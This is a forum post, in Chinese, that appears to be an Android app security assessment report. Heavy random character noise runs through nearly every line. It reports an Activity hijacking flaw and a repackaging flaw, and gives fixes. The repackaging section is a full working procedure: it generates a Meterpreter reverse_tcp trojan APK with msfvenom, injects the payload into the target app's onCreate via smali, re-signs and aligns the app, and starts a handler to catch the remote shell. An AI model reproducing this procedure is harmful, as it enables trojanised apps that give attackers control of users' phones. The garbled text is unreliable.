0 `4 P& C+ Q) |- M0 { 5 L- Z' o) u# V9 J4 t! K. s5 P   7 w1 f4 C( m# M& b% d1 { - a, F% z3 l# _/ J2 z

1 N/ X% d% }' |+ q n 3 c8 N. [. @, z" x3 @( r

/ `. b, q. X. ~! d: w( }; U3 `9 C1 j 2 检测结果                    " W6 K( ~6 s5 |. T 2 s& \( H- A S

- ]- ~% ^# b$ L% W$ B5 Z3 l7 d' e4 A; ?2 t, E8 \

* A3 |0 s! i- F" _4 N ) O( \8 g- ?; x/ m 2.1 某某某 ) c+ M% K/ ^6 }: Z; M5 Y$ _, y 5 {# k4 _. v2 x5 J. ]; X

1 B; W1 N" C; u" v- Y# w ) N$ R5 D0 `- U4 u9 p

$ q& u; k3 ~! f2 Y) X6 A- \- @6 I% a9 K7 g 2.1.1检测目标 ) c; i9 H* I- Y w$ y3 ]0 r# m " h1 {4 |. _$ M1 Q* G' i) |" a/ y7 o

8 m, A. Y8 \1 c : H2 D5 K3 ? o4 v E

( W: }9 h( i$ x9 r I 2 l* N. r9 j; o( H$ Z 目标地址: 某某某某某某APP % P, P; i" b. ]2 F: D. K9 P# U3 m " J+ w2 O% X- U2 T7 B$ M: v

M, E- [; C# C! w2 k. L0 @# h4 f! `! G, v

l9 G1 @( H; {+ S7 ^ 0 V( {2 A3 T8 z; { 2.1.2检测结果 4 V/ _) @! d- X1 ~ 0 `6 G' S; r+ P x2 Z( q& @+ ?

8 S; i$ N! Q* r . D+ l% n9 \ y2 ]5 O1 J$ c% ~9 ?

, x9 H" n8 l7 q6 ^5 P! ~. Q1 C * \4 L1 s7 A# g$ Y# B7 j 2.1.2.1 ! n% t' t" |% d! E: F: s" t t: `9 s) |: M. O

6 a2 [3 f0 P5 r$ I2 U' Q, v 0 f# c8 s3 Y2 p2 f, _/ F

' B! }; q1 e6 m+ z" H' w 3 _# T* E; A2 p7 M' ?; V0 s 漏洞链接地址:某某某某某某APP % _$ k! `1 E: A7 V. D# C & q9 r- {( `9 t4 L; }" O' |

& ^: R. k( h4 V2 h ) t4 G9 T8 Z% ^- a3 W. U; p

' q2 t2 G1 v# e0 V, M# ^: Q1 l8 p& D4 _% P   ! k Y$ w0 ~& a u8 G4 X 1 u1 g0 @9 d6 b6 O+ O

* l7 ]& p6 ^. N8 M7 @ J# ? 8 s; ?% G o5 p* h- J6 Z+ V( C

& z; i5 ?" \9 T. w" Z- E* n& {* Q6 L* V 2 u0 F$ D- c. k7 F) }6 I2 i) W 漏洞分析及取证: ) a8 u# Q7 e1 Z( ] ! U& Q0 v8 a8 ] V' T- |

4 k8 k1 |& \: R9 m6 d8 _- k# c' z7 r4 C6 R8 e B( n

. K, x ~ j. w" |6 d. s S% I, x$ q/ |3 G" k5 X4 [( N                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: / u1 k1 Z( T' O6 Q6 f ( N% l1 K( l8 c! B1 r, K/ G

9 |( q; k2 w: n- s 1 l3 l/ V) R# }5 U& u1 h

7 f' d; n. ] f: D1 X' j4 r ! m6 n* X& [: w6 f8 _      9 t3 L$ I. i; J( w) {# p+ f. M % k2 s) Y: }$ Y. f) z6 H# U4 g$ W

4 ~ E" I3 C/ |/ e* ^3 O2 \ ) }$ p" J0 ]: N( u

: n) Q3 x9 w5 o7 J- L) v* ?2 {3 k7 x" T, U& @( F                       ) _0 n, w( ?4 o1 V2 U E( G; a6 A: j- S9 \# A

) [1 }8 @4 N- j3 w 2 N0 ^5 d" E3 Y* O9 u

7 B4 z4 X( w# Z# y8 M 7 K- I& j7 v" o( V- S+ U$ X9 z " y1 n7 L4 E# i) |3 ^ + V, I3 o% n7 W* p

. U N: X F; G* k/ I8 r) W" ^7 [4 x5 O. \1 E4 {9 O& P

) D# H# x' s2 [ 2 z: ~4 C) ?0 D" f ) z% {! [% L, _2 G: }5 u & c4 D' p) }: J; U3 ?4 v2 v

& j' @7 }; S9 k- v1 H7 @' p 5 A4 I( [) v; j# ]

0 A7 {" k" M8 t% k h& b$ h; v- y. R( M, }' c& k( @ [3 r) Y- A O ' o {, `' @* r/ u: P

. p1 ?9 A4 [- C 7 j+ `# T. z$ G- M5 a. k: N6 F

: v+ D+ @9 Z6 Q; ?% H9 {+ L 6 Z6 h' ]0 D* {3 }8 q 漏洞危害:高 9 t8 H! x& u+ i0 J4 k/ O & s, H4 u7 [6 M5 Y. ~9 p! x& m* }

$ Z$ U1 M9 Z% t+ k x2 s 3 A! ^! N4 p' H$ t1 w1 n; c
4 G5 T9 z" h; N. v, ~! ]3 U! C( h ' d; h+ j d' N+ L. K- U: R% z V. X * x; h# a+ p' j N! E: L. G* ^% g% u# M- d% w0 O i- H, d- Z% V0 C8 ~) x7 j7 o& Q- ]- ]* @3 a$ e6 s5 P% @2 ]1 h1 z; g! f" D% ~2 S4 W9 X4 M% M. |5 r- L( _( j, h8 u$ f( F" x. i! R* p7 H4 G) g0 D4 D( N6 Q) B6 r& V; B* D d% `6 _; M7 `# A9 _% u7 N: F+ A* H( D9 T" W4 O7 _0 n! E" J4 U# ^& I$ D& D+ z/ S$ R9 A& k4 n! U3 f9 b5 G7 Q% Z8 y6 B" u# T! _/ ], u2 X) g5 G2 k3 i! n" D* F( }6 |5 ?: ?/ b9 v7 L# t. `& q7 X7 y; O9 K1 R, @+ e3 ]/ s% B+ c% ~+ z8 d$ n" d4 ]8 {8 t& T l, @5 r1 S3 l6 Y7 G& n0 N% p# T, I+ ~: k2 Z C" [3 | q* F) m- z* N3 S& s# L. E1 q) i r7 ~/ a: r2 o v: d, `6 k) `# J
7 Y( B7 l9 k% _$ u ' T+ w( C4 b, O3 n. g

# ?$ t, o/ G1 I4 {, Y0 l5 V1 e 4 g F" u* ~. F1 r, D; b) t! x6 O 严重程度 3 A* O) v5 B; V2 S0 t% K7 Z k' Q" K/ ]0 w$ T* x; E* a

* i9 t0 a- v% F. C 7 o9 z% ~' s, B 		% F* P7 g C9 y; `) C) F/ _5 p; g1 }6 x

2 {- E( k% s5 a8 d 8 |2 Q! U& A% c5 E2 n 1 H* ~) o- z- |: _8 Q0 Z . N! Q) C1 ^& J. h7 D# a

' x" @' ` v1 z1 w - i+ G3 L6 b" ^9 A) g" d 		5 G0 a% X3 F$ y% U; h 4 y% ?" G& @7 I4 x7 I! X, F

9 z& b6 K, b/ `5 `4 B& m: G% U3 t6 \ * k3 Q) l1 h! E- e% W, c, s' c 1 S: w" O. Y- @! `3 p! \) m. w

, o7 Q9 i E" o$ y0 w+ S" }, l $ E! N3 f* N4 u( ~! l' X$ a+ h. y7 R 		4 Y9 B# m" I: @5 z: j' z! _8 A 8 U% W7 L7 Z: o0 }$ O

3 w" f! M2 Q z- E. F( T' ` W: y 6 |5 Y: w0 i, R/ [# k, L- G9 Z # H7 @# V; |* P" s* D3 s

' Y' ?5 ]+ e1 X K# d+ W# E6 q" ~+ Q6 o& `# [; }, K/ z 		* f8 F9 O# \; g' y# a" v+ G$ U7 [8 W3 h' v4 m1 \

) p% r1 e+ q8 q( X2 s$ s! G& _% n( e) k1 o0 S3 T) X6 e {   H" C+ ~* N! M7 H+ F / D6 |+ I9 @- w: f$ V: i l

$ c2 _# _/ z/ ~( Y2 N% R2 c0 X 		2 {8 a) G0 K+ E' W# n4 ]! e 1 W" p0 o5 o' P0 L

0 H' A) m$ }# y7 ]+ r, T6 c 7 H$ d4 s5 @5 t- G/ T' x! m5 T: \% D# X 8 e& _) { M! K - F: G( R5 u5 q' d/ m/ G

+ D3 q( l% c5 o; U, b8 B# X4 }* v2 a3 m" K. @: l7 Q 		( q2 v- w2 G) P& c 6 V7 r* Y; O( ]$ t- N

" c0 q ]& D9 l/ K8 \$ i3 A4 R1 ^5 V& J. B. n   / s( |# _& T6 W3 ~" k! e! y " q$ Q) R, H- f( Y |1 Q

; D- g" K- O/ f5 Z& s. |) K ( X& ~0 D3 c8 B+ E# x
9 U. B8 Y; c; _9 t3 e ; H2 U7 ~' `9 E2 P2 J6 x$ L# z5 k
9 z+ W& ^. @4 O G - r( d+ s) q$ c

|# ]& T3 q2 |4 Y& X2 S& M; Z( [* P4 }% n# P+ `( m   ) S* V: [7 U$ Z( f2 B: Q! e 0 t( d3 b2 k: ~

( K- {# t# D( l, s" _' ~ 2 q9 K' z R# S( U6 y: q& ?: v

$ t# R1 ^' e0 S G) v/ k- K) ^+ p# H7 q/ c* ~4 r 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ' j" z) Z: m ^4 Q 2 B* A, x- C' B: n( o1 X! j9 f

* c: P0 q* y& O/ P0 ?: P5 B; S6 z/ f; r; u+ @

' Y% v* _4 o! \! {# Y- J0 ] , H i( s7 ~; a           : D/ M1 j& P8 a; ?4 [5 t; C" i' J0 N V7 m9 I) L A

$ b- V: c$ f/ ` / P B( o, c) Y' ~. |

1 [0 {* h$ F+ P7 @4 N( @6 e: `- G & x$ R8 p5 q% d1 z# I- O P+ Z   9 z- D8 v1 o5 H5 }$ I. |1 G8 T( L# E/ a% X

) t( P7 ]6 V1 B1 _ 6 s4 @& w9 o" ]; s& V

; S2 u" ]/ R5 m 5 p% ]6 a$ z6 h( f" q, | 2.1.2.2 ) b/ B- w5 m) T* d4 n 1 E2 }: Q& r+ X

. E! H1 G/ c1 C! ^2 y# ~ * c C6 ` B9 N3 e

u1 Y2 Y; _5 r B9 o! x% M ' u. R1 ?, Q- q0 ?* ^ 漏洞链接地址:某某某某某某APP . Y& X( q5 G; `" c " r7 r% S& H) k. w/ D

$ n u! y9 b0 R ( M# I2 U. @' a$ G& d% {! a. V# @

; ~8 F2 r: Z, \- `! V% X9 Z+ \% G 漏洞分析及取证: 4 O8 O# }. q7 Y1 f. Q 1 J7 I. k. w1 @' W$ i# y& \

; ]( ?1 l* c5 B; N* ~ ( X r9 T2 }2 T I7 m5 @& h

- f& t# A0 y4 M 6 _. m7 A+ U2 t3 z! X p; U$ q4 i                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: # D+ D6 _5 r s; F 2 g" a3 n5 y8 `

8 P) D) b( _6 ] I/ o& b( ^3 V: c4 B7 c7 k0 \9 k& a% K; g: S/ R

6 J- Q0 \2 g- ^/ l3 |- K2 d 1 M9 ~2 P2 _* l Metasploit 生成木马 apk 4 l$ U$ F0 Q- D + N- }: E/ Q5 B+ g2 e

! r. f, {6 f6 }- D 5 G. ~1 Q: H$ z! o

Z, R& a, |5 I5 f, W, _ , l/ s0 W1 l, ~! x msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk . {! e( w3 T- _) u, y, {8 v* n 0 [5 T: N9 A. X- @ Z

* V! |! B ?, t c$ m" L k. a' G, g6 C- X) |% O* `4 t9 `; a# f9 W

2 O- L8 P3 m0 j / g( l9 h. p F2 S) J4 b 反编译目标apk和木马apk ! K7 S, X" ?6 v; h" H# K, {0 G! Y6 }2 Y8 f! |$ d

$ B9 b' C( Q1 n/ u9 I6 g3 E 1 s4 T* a- q$ D% ]: c

V# _% A/ y) _5 r; ]3 U' i: Z9 A ! ^* S3 j$ B5 q. X0 ` apktool d target.apk
' I n: f; w5 C7 z; ?4 q 0 A1 Y2 Y, K5 Y' _( j. u! d apktool d cockhorse.apk 1 ^" l, C; I' E4 M, X2 v3 g$ F, {# l S% Y8 S

: z4 v0 V; r) G' W6 E) K% R9 h6 Q; u; e/ U' s5 J* q+ e

" E7 j3 R5 H, k) x 7 A% C: Y/ h0 Y2 W, \8 D6 M 木马 apk 注入目标 apk $ ~$ z6 T/ `8 c! B : r$ h& t/ Z. ^4 O

0 }5 a5 E" B7 x4 i; o4 s / @) A1 r5 E, `. H

" P+ s, G6 |; R/ P, Q- F8 G7 t+ \; @) \7 @5 N3 X 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
% o6 M0 V$ Y7 G! w9 G6 q $ S' S4 E4 B4 m4 q invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V # O( ~4 H4 D' D) g: k 9 U6 P" n) t; e4 x0 m! K2 _

1 B! E' A2 U4 \ 4 B# }# {- O+ w* v

! x1 H5 j5 o+ w. Q$ r" o+ e i% z& R# V) F) l+ B; d 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 |5 t7 c! E0 ?8 R ) _6 |5 I4 g4 W5 _$ m Z0 I

6 ^: c$ a, Z2 m( q& Q9 _. m* k7 k# D' }" z

, T. p4 C6 ^5 c% L $ u/ N e w* P8 I) O: `% B8 q; c 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ * h9 h6 B! o4 c, @# `% T0 f1 e# v8 s9 o& r6 E- o7 w" ?

. L: \1 l; E. U/ E% g7 ^) L) u1 j) }2 _! u2 a

$ O/ E: ?$ R3 c. }8 i " n! s) X+ x1 q' d( G 回编译生成最终 apk ' X* t- Q+ \7 i 9 m- t9 Y, `. _( G$ u

. q) U# s0 ], x+ z# g) F * O; T* c" a) ^+ g8 h% m

+ P2 e2 A* k( e4 ]. K 5 R, R! n+ O& w# R! l! g1 b 重新打包 / U. _* n3 W' d" L5 q/ j * k8 h" |+ s- a: y8 y

" B5 n2 ?. _: X' ^: K+ ~ n N ]) V, l9 r9 f- t

! x, a! ?* L" q' R 6 X7 ~9 M/ B ~ apktool b -o repackage.apk target_app_floder - L: D; ]5 C1 x! \! T6 M" G : \* n: f+ `+ \

; W w) z- O# `0 m8 y; ?5 {" l9 r: ? " Z) I. v. c: I b) t+ i

/ ]/ y2 n9 q; p6 K) Q6 g' T1 y; M & i$ `. {, f( D. }% E- B( D* H$ o 创建签名文件,有的话可忽略此步骤 , q; I1 h/ E% R; l E7 J& r2 i; r- ?" x' _7 k+ q2 ^. y! o

* k4 G2 x: s( d5 @" x0 @' D P% g: y4 p4 H! V% j9 E

; }; s. q7 {# Z, {( m" ] / _, F$ a: @! }1 d keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                - I9 [5 {" O j% Z/ q% o% | 1 A) K N, G# I$ Q/ A

8 ~. \% v8 q- R/ a$ d0 E/ Q- H* ?4 W' N+ ?( l- z

. g6 c+ x! ]. U" T9 Y8 Y / C# _% i2 I4 C" r5 W, s5 H& a 签名,以下任选其一 # P! o0 ?6 D) x- i( b% z3 p. p 5 m$ @$ Q1 t3 J' a" S

- I$ v1 |, R1 E% S) O" p1 B& A9 e2 B 3 B' l0 ~; H. J" i; E4 L

- v% `2 w E4 D, g ( I7 X, Z3 K$ G8 N3 w, Z9 R! H/ y jarsigner 方式 0 L& g: E- G% P! X % i3 v+ R) J: d& f3 H

, F' m7 U3 I+ X i, X9 ]) H 0 ]7 E4 J! |& Z7 T9 T3 f

# s" C! O1 \& ^7 W' Z% ~4 h ( ?9 H" _9 t% c2 A" ] jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 4 I7 u% V, Q/ y1 R, Z+ l2 ?, _! Y7 U& q7 w. T

% Y( Z! @* u3 y $ J( ^2 P* b; x0 r- E

2 p& U, C; C5 M* D: K- M+ x$ v2 n# N6 p- ]! x- ^7 Y6 k( J apksigner 方式 9 R/ C [7 A7 D" I0 R2 a$ V/ ^: c 0 l3 @' a) G! w) v$ C/ \

' Y4 w# `/ Y- j: {, t " _& L, i# D+ p* x' G# J% R

* K* }/ y. U$ Q+ C. D $ Y# j) ~* q( u( Q$ U; z6 [ apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk , u, j, K% u2 W3 O0 h ( N" F, o2 F& H. R9 _( Q

/ d$ K9 m9 H* K4 Z 1 P+ O# ^0 W& z( f

) K5 z0 ~9 E1 f0 p5 q 1 J% H* C0 @9 c. I8 r 如需要禁用 v2签名 添加选项--v2-signing-enabled false ' j0 o) p4 T ~4 Q, ^3 l 2 A' o. ~* P/ [2 R

" H! p, _2 M( q6 E: t ! D) `+ Y& b$ c; K

8 i' E) s7 f3 j8 `6 l6 i" Z, b' N9 \0 x; s 验证,以下任选其一 2 g0 g' [! O- B, L 9 J3 N4 ~5 V3 m; }

! W! K$ V* b( ?4 i G. v5 L9 A4 b " w' e. R/ O* ~. Y

9 u8 G& ^9 c0 o i" D& r8 E5 U, m+ E- D& C) e, W jarsigner方式 1 [( J! D! C; n$ w- v% Y# q+ d / B9 C1 Z3 | K a1 `# E: i% Y

' ~( D1 w/ ^8 h- J* } + E6 m% X6 p& K$ ]6 j

+ q0 ^9 G$ i; a " X- x+ @* J6 Z$ i jarsigner -verify repackaged.apk 6 b0 }, y9 B+ x7 C 5 o; g7 ^; [) l0 Z' E O

, K1 n6 C9 m- F# D, W & z- \) U% r. ~, q! k* z8 {

9 j* _, |/ M+ X( A$ N * Z% Z. h- S* n9 K! D8 \7 ^ apksigner 方式 1 J0 G( I2 S7 b 1 y2 r( I5 P1 Q9 U! ~* O

" l. [6 I: U+ t5 _$ g, n* t f o4 m* x1 j5 A2 t" ~- j

! Y- E" Q' @% B) h2 w4 \% U0 e6 s# K. z8 q. N3 P. H: z# b4 d apksigner verify -v --print-certs repackaged.apk & m% Z$ R+ w' E6 m2 y7 E* u8 t6 f2 [ $ J* v& y' f- H0 G3 E

& G* P8 S3 j0 ?, l6 m * S; f" e0 `2 q$ d

8 g. K2 J! Q0 j* y+ | 0 H1 U$ S. m6 L9 t% X# X keytool方式 . d0 o `# l" i# q. W$ X' Z5 H& ]& n" x" C$ B& d7 o$ o2 q9 ?

6 r( }' { g, H: B! i + m; X* Y/ J" q

9 ^. d9 e8 q8 U" y5 Z& S$ X5 v0 I2 I; A" u% c6 }) f keytool -printcert -jarfile repackaged.apk b% N, [ |; g0 I( G9 i / f0 H- t9 j0 ]' `

, e4 E- j r7 \) C8 |+ i$ x3 d. x+ u* O3 D5 P

' S+ _; ?. G$ V+ A2 }" ?% Y9 k# Y9 { q6 t- _ 对齐 W7 L3 R. l; _1 V% y- } i7 _' {" X. p; v% N+ N

5 E; B, W& l8 ?5 g, F! m- p' O; Q, T+ t# h8 y+ K

6 E# e% a/ K5 ` . Q5 N4 F0 o' U& X0 y/ g 字节对齐优化 $ j9 P: v \8 i$ ]& o 8 g9 w& `' _( K) B+ U: C3 r

; n' d- q1 }7 B: n" X 4 n. m0 [" K1 h8 a0 k3 j; A; O: q

0 u0 e; y$ O1 ~7 u: I2 r - d3 w- c" [+ N# C2 D zipalign -v 4 repackaged.apk final.apk % h, W8 [$ V' f# s: w , e% Q* J" D7 P5 N7 V: p& [. d

- q( _9 n) g0 A& y/ G8 m0 g! m/ V- i) s; W

, K. S( K+ C+ f* J" U C/ N/ o / _8 O. Z" [/ O" c* G1 n+ V 检查是否对齐 ) c- z- L0 Y6 b % `4 q8 t- i/ W) \/ a

' w( v( `& J2 P. e, ]+ g) t : P/ H# E% j9 H* ^7 M" W

' O* z. ?% v2 P6 X $ N5 f( T4 A" Q( X/ g. T zipalign -c -v 4 final.apk 6 G( C& i# H% d ?) l $ n- d4 U- t5 K2 B

' L9 |( Z. V5 E! g; l" @+ O0 I( f % N. q4 E5 j u, F

5 W! `& k; e/ U & I% o# e8 y, w" P9 s2 ~3 a 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 3 F: `; Y. ]1 m6 k, N2 q, _ 5 h, w5 ~$ r) u5 Z' {4 u, N4 r

( V' O1 `3 g+ C$ ?/ K- r1 f4 z& t & Y8 D/ X6 _5 y. U

8 O8 r; i: ]+ m& U7 x* K, u 7 w* `) b- P, Y% A7 @% r5 ^ 启动Metasploit控制台,配置参数等待上线 4 S3 t5 R$ a7 O" E# x; f+ ~6 k6 I" `/ j

% n; ~/ [! @' E% s, ]5 P/ C5 Y: l- f+ p8 x$ | P! E) R

" l7 u1 `4 g0 j: H# o# _ 5 K3 T$ e, e, H* ^; L 在终端依次输入如下命令 1 O9 Q, c8 n8 V4 z$ ~, E/ V& z$ o3 T

; W$ y: S1 G d; _* f: y9 t6 U1 s4 o" H/ @. J

7 z# S, c: b% ]: }/ ^ + i9 Y6 c6 X8 H9 \0 W! z5 E msfconsole - B5 j1 @! V7 j- x% g3 a, U9 O7 d. `7 v

* `% R- l3 J9 E0 X. P$ l) o ; J4 ?# S% z5 y: Y0 t

1 H) J) I; \/ N: w ; t) H# k4 v! y% [) O use exploit/multi/handler ' ?" ~0 |0 S# G7 L3 u p8 d- I& v . X q$ f/ @1 X9 M; R/ h8 c

9 p5 \- m% R2 h& }, f6 m - s3 u9 h# H- t( C9 ]# T; O2 O2 n

, M& z( D/ T; R" |/ }2 O* Z7 f' Q1 @: k L! V! n, ?8 _: |( q set PAYLOAD android/meterpreter/reverse_tcp 2 N) C7 j, i4 t: Y+ Y7 H B; R ; `: C3 p7 |5 \' C( x: [1 Q

+ o- s& V+ T" \ 9 A g+ }- e3 l- b g1 A! Y" j

) Z0 _5 O+ D( K $ u5 H& l9 [2 A* m- f+ s! i' O set LHOST 192.xxx.xx.xx + X6 @- G2 C) s% m7 q5 n3 [ - D( B! E( h z# @; V

! @( Q4 L( V" C" s9 l3 h# d; \: S9 ]! i# O2 I7 u+ l

8 a% I/ u* Q/ `0 [ 2 X5 q! V6 c, Y3 o set LPORT 4444 0 T2 E8 `% t3 W- N 4 n4 y, K; Q e! K

, `4 R6 q9 V( k( D h1 |. S$ |8 o8 \! a1 ^/ Q9 a

# w0 C* q7 V+ E8 p " |9 w) Z, w) @" g1 i: ^- q# D exploit 6 U" Q/ f- j& I) [% f) v, Z2 ]+ ?& j3 M' D F0 R- W+ v

& Q, S# f6 g7 t; q4 A( i/ w ) }& P! l+ U4 H. P O

/ `, Q/ l7 O, q: L( o6 u ) r0 Q2 S3 Y& X5 D* y8 o 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ; o( G3 Y- j. r' b+ I: n5 O & s: G b4 A5 l# j

4 s P: H5 ^% C0 c4 d5 [7 o9 T " J; p. {) R8 k* M

5 E: ]% Q; T! m, l2 L& U d% ]3 S5 G! Z* R+ h: V* N 漏洞危害:中 " v1 Q. J" c6 J8 v7 w1 z$ Q ) u8 x& m3 g R$ f# s

6 R& O8 U( s9 C& b5 A n; T" a- L! `6 _( B9 B
) j7 F/ q9 k+ k$ x : a( t- @2 m8 Q0 K6 w" c ( J( L' g4 T* Z/ `/ T/ B: x, E/ [9 ^% K 6 B, b, s/ U. D3 h) }+ F/ t# F& V/ S: G+ M/ A5 }7 A& w, B+ b5 E2 ?6 i1 Y6 B) D$ y# e7 J7 r4 A" @' n3 Z- @% m( u. d' B9 o: ]0 Q8 F Y7 X+ l3 Y/ d' }* f7 T( @2 |. Y) ~1 s2 E4 V! t4 g/ E' o) U V+ C7 ?" P% K2 D. ?! S6 \& R8 {& s4 p4 K" {+ a+ R. i/ h5 m% y- p3 p0 E* J- e* I$ H4 W& d$ u2 _: m2 d# K; [# `% I9 Y/ d1 _) h: S! @7 _; v/ ^9 b$ b3 ~: @6 T9 p5 M, n. O! c/ w- J" S& d- P* P( F. [. [0 \8 |" o/ u) d/ M7 Q5 W2 I2 E6 y4 y* L ?* u0 M5 n" K) n# }9 |1 S. J5 H B0 F9 y" ~* _" b1 Z5 J# n9 V! @8 u# y% M% v6 H8 \- v9 v: l: @9 W0 z3 N2 T6 E$ b% B1 K/ a% ?' E' i# F a k- K+ T2 Q% J! w# V1 ^9 Q! H
" g& T7 ^5 Z1 ?: v8 ]+ t. y6 V5 Z

/ s, Z' k+ u# @5 D+ \ D1 P j: p8 ?: j, }# L 严重程度 : |2 i h w8 l! d ; E4 _. I, f/ Q; K C

4 P% t" l9 q% c9 y( O7 Z- z, l6 Q8 T9 q: ]. X J9 \ 		9 W$ w% p3 s) b2 i8 y ) @ ^% }" \( I' J7 W! F

$ ^, s9 d \$ X' V7 z/ v) g; m 1 E: y: y( [$ f 1 e6 p$ O+ A) a8 v& F 1 ]8 R! }* U* @+ s. k

# k% y1 [/ C% ~+ L, _0 e # C6 O& |% s9 a( ` 		/ i3 w$ x# E+ P. ]4 r% q0 {& K 7 {3 f5 F, t2 F+ W% Y2 W

* T( f2 @$ q$ l3 K9 D/ M" N- q5 W9 P; M3 W- s; e0 P' B 5 i2 R0 p( j4 G# h5 a2 o% e8 h; h. R6 `2 P, Z; G" W( m

8 V; A6 E6 V% C8 s8 N2 b0 e& p( {; o4 A- x8 k 		+ W2 R/ {, m- l4 ?8 D) g4 ` @& m+ J. w" }5 @- H/ V

1 w7 g. ]- P5 ^6 z- W) A& x0 e4 M1 D: H9 _ 4 o: q, i) B7 m0 Y. f& S% e& V 1 p" e, v+ ~# b) }& Q# w& x

1 U. ^) O& B4 Q \5 x7 k3 w; I3 r4 ~+ }1 e 		% X7 A- z& c" E: C 9 R3 Y& `, L0 k0 o7 O : Q7 Z. p5 Z" W% v4 C8 K4 } 4 [4 X) k8 R5 y

8 d$ K2 c+ w* Y ?4 K h 7 `3 w5 `( m. V9 P) B- P% h   " z7 [. o9 {& m8 E 3 y. H# {: J- G) M- D

) d% q/ t& p4 `$ \/ G* h3 s8 g5 `" I4 u( v 		, Y2 a# b" o4 u2 c 6 u! s6 i1 b# j9 U

; B7 c! @ w" Z m / u: ~$ C: |' x5 t4 B2 } 0 U) y+ K" \: y% {$ q+ {/ q+ K5 Q0 ^; W4 D5 ^+ n

( }; O, a- K0 U4 [/ ~ | 5 X4 s% R' Z" v! E9 M6 ? 		2 w' O) ]# l( Z; t* b z9 \7 x! A* K0 a+ d ( o- R2 n, w( ]# W5 U! M+ {2 a: q. r7 @0 s2 C

0 `# i# ]! U. ? 1 l4 r5 x4 u' W9 _1 T) X! h   ( x* ]4 L6 \/ ~ g; z5 U6 t 3 c5 ]* |: {# z

- Z/ O8 Y5 }3 I8 O 3 G8 X7 L7 B6 ]& O) Y5 C" n8 U) L
& e- V$ n& O' `0 @9 [3 ~" O: L5 T* R
* j# b1 a% ~0 ]# ]5 X; Z; [" K3 ?& l& I

8 }$ N' j8 n5 u4 _& i {! z( | # O% S) ~/ B+ J" d1 o( W   % F f* `% m% S2 i7 \6 ~0 D- g3 X+ L: _; g2 E. ?

: w; r( C2 N& a, {( k! [& _$ Q# K; t / C' J8 f9 a j" O" ~4 S

* E6 |$ r/ `6 ^. ~- W* A# X 8 d1 ~2 a: I* ~4 |/ Q 修复方法: ! f- v* f- B3 k q2 {6 G" {7 d0 J8 ]& h& c& i% |9 R `; L9 E

2 U+ n- ]8 F' h: r. w3 L/ d9 Z e: G; l- p' Q$ H$ _# ]

4 \2 |& j% a0 u2 a" D& }6 s4 V; ]4 k- u               1. APP 启动时应做签名校验防止二次打包。
& r/ }5 S+ P% c$ ^7 C8 u1 E& p' ?$ ~! d* V; s# \ 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 4 f+ s$ V o; y7 e- Q 9 N J6 B8 \% y/ ~2 h

. T7 T: H- y" O 7 w. A8 s7 Y; J. ]6 j3 f 8 b" f. P% D9 p$ |1 P( o& K+ ?1 I4 J5 L

# H" a, W* L" Z8 X- g2 E: M- s 9 j" k" N1 Z5 i' q4 r5 i5 y9 ?   % ^( `) @4 R4 [6 \. z # J8 P/ v' j7 i6 C6 e

. \# l' E% u" U5 e! h 5 f+ o0 M/ t( D8 I $ j& ]4 [- w* L* m % S) w6 ~4 m& O) U

" ~' h. \* d5 P, _$ x0 E/ e# Z+ Y4 k1 n; J( R2 o6 O$ v
; {1 ?4 G, i1 }8 ~! r9 s# p5 B% G/ s$ T/ P9 Y2 n

/ B7 a* {* ?. X+ P ) x5 V% z0 ^- } E5 w0 L
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表